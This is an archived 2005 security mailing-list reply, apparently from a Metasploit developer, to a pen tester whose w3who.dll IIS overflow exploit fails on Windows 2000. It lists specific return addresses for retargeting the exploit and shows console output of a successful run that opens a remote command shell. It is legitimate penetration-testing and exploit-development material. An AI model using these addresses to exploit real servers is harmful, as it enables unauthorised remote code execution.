Re: question regarding w3who.dll bug

[H D Moore <sflist () digitaloffense net>]

The return address for Windows 2000 fails because the ImageBase for the 
DLL is different. I forget to check the base address on 2000 after fixing 
the code to work on Windows XP SP2 :-(

A new module will be posted to metasploit.com shortly. In the meantime, 
just change the return address in the Targets section to one of the 
following:

0x01169f4a (pop eax, pop ebp, ret @w3who.dll w/base 0x01150000)
0x75022ac4 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])
0x750236b1 (pop esi, pop ebx, ret @ws2help.dll [Win2k English])

If you run into any other bugs or reliability problems with the Metasploit 
Framework, *please* drop us an email at msfdev[at]metasploit.com :-)

-HD

---
msf iis_w3who_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Attempting to exploit target Windows 2000 RESKIT DLL (Win2000)
[*] Sending 8254 bytes to remote host.
[*] Waiting for a response...
[*] Got connection from 192.168.0.100:34885 <-> 192.168.0.237:4444

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>   


On Friday 14 January 2005 02:49, Martin Bernhard wrote:
> Hi,
>
> As one of our clients is running some IIS web servers with w3who.dll on
> them, I figured that this would be a good place to start our pen test.
> Unfortunately, the exploit in the new release of the Metasploit
> Framework did not work on the most important servers (Windows 2000). I
> have access to a test system that gives me the opportunity to analyze
> the bug in detail, but I can’t figure out what parts in memory are
> overwritten. Does anybody know what exactly I have to do to trigger the
> bug and analyze it (I’m using ollydbg)?
>
> Any help is much appreciated